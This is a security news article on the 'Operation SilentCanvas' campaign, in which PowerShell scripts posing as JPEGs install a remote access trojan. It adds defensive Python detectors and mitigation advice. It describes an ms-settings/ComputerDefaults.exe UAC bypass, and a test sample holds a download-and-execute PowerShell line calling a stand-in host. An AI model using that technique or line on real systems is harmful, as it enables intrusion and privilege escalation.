
Hackers Are Hiding Trojans in JPEG Files to Hijack Windows PCs—Here’s How to Protect Yourself

Inside Operation SilentCanvas: When a JPEG Isn’t Really an Image

A harmless-looking file named something like “sysupdate.jpeg” can, in fact, be a PowerShell script designed to hijack your Windows PC. Operation SilentCanvas, uncovered by Cyfirma researchers, turns fake JPEGs into the first stage of a multi-step compromise. These JPEG trojan attacks abuse the trust users place in common image formats. The files carry no valid JPEG header (a real JPEG begins with the bytes FF D8 FF), yet they slip past superficial checks that look only at the extension, not the content. Once the script is executed, it begins building an attack chain that standard Windows malware protection may miss, particularly when tools only scan files on disk or rely on signature-based detection. This tactic shows why PowerShell script security is now a frontline concern: attackers no longer rely on obvious .ps1 scripts or executables but lean on file spoofing and social engineering to bypass user suspicion and basic defenses.

How Fake JPEGs Deploy Remote Access Trojans and Bypass Windows Security

After a victim interacts with the spoofed JPEG, the hidden PowerShell code silently creates a C:\Systems folder and reaches out over an encrypted channel to download a trojanized ScreenConnect package from a remote server on TCP port 5443. It then pulls a secondary “access.jpeg” payload that executes entirely in memory, so scanners that only inspect files on disk never see it. To gain elevated privileges without alarming the user, the malware hijacks the ms-settings registry key in the user's hive and launches ComputerDefaults.exe, an auto-elevating Windows binary that consults that key; the command planted there runs as administrator with no User Account Control prompt, and the malware deletes the key within two seconds to cover its tracks. The result is a deeply embedded remote access trojan with extensive control over the device. This combination of in-memory execution, extension spoofing, and abuse of legitimate Windows binaries makes detection difficult for organizations that lack strong behavioral monitoring and strict PowerShell usage controls.
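The hit-and-run registry hijack above (handler written, ComputerDefaults.exe launched, key deleted seconds later) is easier to catch by correlating events than by looking at any one of them. The following detector is an added example written for this article, not Cyfirma's or the article's code. The event records are constructed to resemble Sysmon events (ID 13 registry value set, ID 12 registry key create/delete, ID 1 process create) and reuse Sysmon's field names; the specific subkey, Shell\Open\command under ms-settings, is the handler ComputerDefaults.exe consults and is assumed here, since the article names only the ms-settings key.

```python
"""Correlate a short-lived ms-settings handler hijack across registry and process events.

Added example, not the article's or Cyfirma's code. Records below are constructed
to look like Sysmon events; field names (Image, TargetObject, EventType, Details)
follow Sysmon, the values are made up. The Shell\\Open\\command subkey is assumed.
"""
from dataclasses import dataclass
from datetime import datetime, timedelta

HANDLER_KEY = r"\software\classes\ms-settings\shell\open\command"  # assumed subkey
TRIGGER_IMAGE = r"\computerdefaults.exe"


@dataclass
class Event:
    ts: datetime
    event_id: int          # 1 = process create, 12 = key create/delete, 13 = value set
    image: str = ""        # process that performed the action (or was started)
    target: str = ""       # registry object for ID 12/13
    event_type: str = ""   # Sysmon EventType: SetValue, CreateKey, DeleteKey
    details: str = ""      # value data for ID 13


def is_handler_write(e: Event) -> bool:
    return e.event_id == 13 and HANDLER_KEY in e.target.lower()


def is_handler_delete(e: Event) -> bool:
    return (e.event_id == 12 and e.event_type == "DeleteKey"
            and "ms-settings" in e.target.lower())


def is_trigger_launch(e: Event) -> bool:
    return e.event_id == 1 and e.image.lower().endswith(TRIGGER_IMAGE)


def detect_uac_bypass(events, window=timedelta(seconds=10)):
    """Return one alert per ms-settings handler write, scored by what follows it.

    'high'   : handler written, ComputerDefaults.exe started and key deleted inside
               the window (the write-trigger-delete pattern the article describes)
    'medium' : write plus only one of those follow-ups
    'low'    : bare write; worth a look but not proof on its own
    """
    events = sorted(events, key=lambda e: e.ts)
    alerts = []
    for i, e in enumerate(events):
        if not is_handler_write(e):
            continue
        follow = [x for x in events[i + 1:] if x.ts - e.ts <= window]
        launched = any(is_trigger_launch(x) for x in follow)
        deleted = any(is_handler_delete(x) for x in follow)
        severity = {2: "high", 1: "medium", 0: "low"}[int(launched) + int(deleted)]
        alerts.append({
            "time": e.ts.isoformat(),
            "writer": e.image,
            "value": e.details,
            "trigger_launched": launched,
            "key_deleted": deleted,
            "severity": severity,
        })
    return alerts


# Constructed sample: a PowerShell process plants the handler, ComputerDefaults.exe
# starts half a second later, the key is gone within two seconds, then an unrelated
# file-association change happens that must not alert.
T0 = datetime(2024, 1, 1, 12, 0, 0)
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
HIVE = r"HKU\S-1-5-21-1111-2222-3333-1001\Software\Classes"
SAMPLE_EVENTS = [
    Event(T0, 1, image=r"C:\Windows\explorer.exe"),
    Event(T0 + timedelta(seconds=1), 13, image=PS,
          target=HIVE + r"\ms-settings\Shell\Open\command\(Default)",
          event_type="SetValue", details="<constructed elevated command line>"),
    Event(T0 + timedelta(seconds=1, milliseconds=500), 1,
          image=r"C:\Windows\System32\ComputerDefaults.exe"),
    Event(T0 + timedelta(seconds=2, milliseconds=800), 12, image=PS,
          target=HIVE + r"\ms-settings", event_type="DeleteKey"),
    Event(T0 + timedelta(seconds=30), 13, image=r"C:\Windows\System32\rundll32.exe",
          target=HIVE + r"\.txt\(Default)", event_type="SetValue", details="txtfile"),
]

if __name__ == "__main__":
    for alert in detect_uac_bypass(SAMPLE_EVENTS):
        print(alert)
```

In production the same logic runs over Sysmon or EDR telemetry keyed by host; the window is deliberately wider than the two seconds the article reports so that a slightly slower variant still correlates.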

From One PC to Full Surveillance: What Attackers Can Do After Infection

Once the trojanized ScreenConnect payload is installed in C:\ProgramData\OneDriveServer\, your machine effectively turns into a surveillance endpoint. The malware sets up an “OneDriveServers” service to maintain persistence across reboots, granting attackers reliable, ongoing access. Through this remote access trojan foothold, adversaries can monitor your screen activity, record keystrokes, and potentially access your microphone, camera, and clipboard contents. They can also exfiltrate files using encrypted channels, all while blending in with normal system behavior. In enterprise environments, this level of control enables rapid lateral movement as attackers use the compromised host to pivot toward file servers, administrative accounts, and critical applications. Because many organizations legitimately use remote management tools like ScreenConnect, distinguishing malicious from authorized activity becomes challenging without strict access controls and detailed logging.

Why File Spoofing and Phishing Make These Attacks Hard to Spot

Operation SilentCanvas relies heavily on social engineering and file extension spoofing to trick users into launching malware. The malicious JPEG trojan attacks often arrive via phishing emails posing as Social Security Administration notices or urgent software update alerts. Victims see familiar icons and file names, assume they are simple images or updates, and open them without a second thought. Because the files carry .jpeg extensions, many users, and some basic security tools, treat them as low-risk. In reality, the content is PowerShell code, not image data. This mismatch between appearance and behavior defeats casual visual checks and shows why checking the extension alone is not file spoofing prevention. For enterprises, a single user fooled by a convincing phishing lure can give attackers an initial beachhead, from which they can move quickly and quietly across the internal network if monitoring is weak.

Practical Steps to Detect and Block JPEG-Based PowerShell Attacks

Users and security teams can significantly reduce the risk of these Windows malware protection bypasses with a few disciplined measures. First, always verify file properties: right-click suspicious “images,” check their size, type, and details, and avoid opening unexpected attachments that claim to be system updates or government notices. Enforce strict PowerShell script security: turn on Script Block Logging and Module Logging, restrict scripts with AppLocker or Windows Defender Application Control (which also puts PowerShell into Constrained Language Mode), and alert on PowerShell launched from unusual paths or fed a non-script file such as a .jpeg. Use application allowlisting to block abuse of high-risk binaries like csc.exe, and watch ComputerDefaults.exe specifically: it is a signed Windows component that allowlisting will usually permit, so the effective defenses are monitoring writes to the ms-settings key under HKCU\Software\Classes and setting UAC to “Always notify,” which makes auto-elevating binaries prompt instead of elevating silently. Tightly control remote support tools such as ScreenConnect. Endpoint protection platforms with behavioral analysis are essential for spotting in-memory payloads and persistence services like “OneDriveServers.” If compromise is suspected, isolate the host, reset stored credentials from a clean machine, and check specifically for the C:\Systems and C:\ProgramData\OneDriveServer directories and for a service named OneDriveServers.
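The file-property check above can be automated: a real image starts with a fixed signature, and a PowerShell script dropped under a .jpeg name does not. The checker below is an added example written for this article, not Cyfirma's or the article's code. The JPEG, PNG and GIF signatures are the formats' standard magic bytes; the PowerShell token list, the directory-scan helper and the sample file contents are constructed for this demonstration, and it goes slightly beyond the article by also flagging polyglots (valid image header with script text inside) and non-JPEG formats hiding under a .jpeg name.

```python
"""Content-versus-extension check for files that claim to be images.

Added example, not the article's or Cyfirma's code. MAGIC holds the standard
signatures; SCRIPT_PATTERN, scan_directory and the sample blobs are constructed.
"""
import os
import re

# Standard file signatures. A real JPEG always begins with FF D8 FF.
MAGIC = {
    ".jpg":  (b"\xff\xd8\xff",),
    ".jpeg": (b"\xff\xd8\xff",),
    ".png":  (b"\x89PNG\r\n\x1a\n",),
    ".gif":  (b"GIF87a", b"GIF89a"),
}

# Constructed token list; extend it with what your own PowerShell logs show.
SCRIPT_PATTERN = re.compile(
    r"\b(?:iex|invoke-expression|invoke-webrequest|downloadstring|downloadfile|"
    r"frombase64string|encodedcommand|new-object|start-process|set-itemproperty)\b",
    re.IGNORECASE,
)


def looks_like_script(data: bytes) -> bool:
    """True if the bytes read as PowerShell-style text (ASCII/UTF-8, or UTF-16 with BOM)."""
    if data[:2] in (b"\xff\xfe", b"\xfe\xff"):
        text = data.decode("utf-16", errors="ignore")
    else:
        text = data.decode("latin-1")   # never fails, so binary content is inspected too
    return SCRIPT_PATTERN.search(text) is not None


def classify(data: bytes, ext: str) -> str:
    """Compare a file's bytes with what its extension promises."""
    ext = ext.lower()
    if ext not in MAGIC:
        return "not-an-image-extension"
    header_ok = any(data.startswith(sig) for sig in MAGIC[ext])
    script = looks_like_script(data)
    if header_ok and not script:
        return "ok"
    if header_ok:
        return "polyglot-suspect"            # valid header, script text inside
    if script:
        return "script-disguised-as-image"   # the SilentCanvas case
    return "header-mismatch"                 # some other format, or junk


def scan_directory(root: str, max_read: int = 1 << 20):
    """Walk root and return (path, verdict) for every image-named file that is not ok."""
    findings = []
    for dirpath, _, names in os.walk(root):
        for name in names:
            ext = os.path.splitext(name)[1]
            if ext.lower() not in MAGIC:
                continue
            path = os.path.join(dirpath, name)
            with open(path, "rb") as fh:
                verdict = classify(fh.read(max_read), ext)
            if verdict != "ok":
                findings.append((path, verdict))
    return findings


# Constructed samples: a JFIF header with padding, and two fake "images" that are scripts.
REAL_JPEG = b"\xff\xd8\xff\xe0\x00\x10JFIF\x00\x01\x01\x01\x00H\x00H\x00\x00" + b"\x00" * 64
FAKE_JPEG = (b"$u='https://example.invalid/access.jpeg';"
             b"IEX (New-Object Net.WebClient).DownloadString($u)")
FAKE_JPEG_UTF16 = "Invoke-Expression (Get-Content 'C:\\Systems\\x.txt')".encode("utf-16")

if __name__ == "__main__":
    for label, blob in (("real", REAL_JPEG), ("fake", FAKE_JPEG), ("fake-utf16", FAKE_JPEG_UTF16)):
        print(f"{label:10s} sysupdate.jpeg -> {classify(blob, '.jpeg')}")
```

Point scan_directory at user download folders, mail attachment caches and the C:\Systems path named in the article; a "header-mismatch" on its own may just be a mislabeled PNG, while "script-disguised-as-image" is worth an immediate look.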
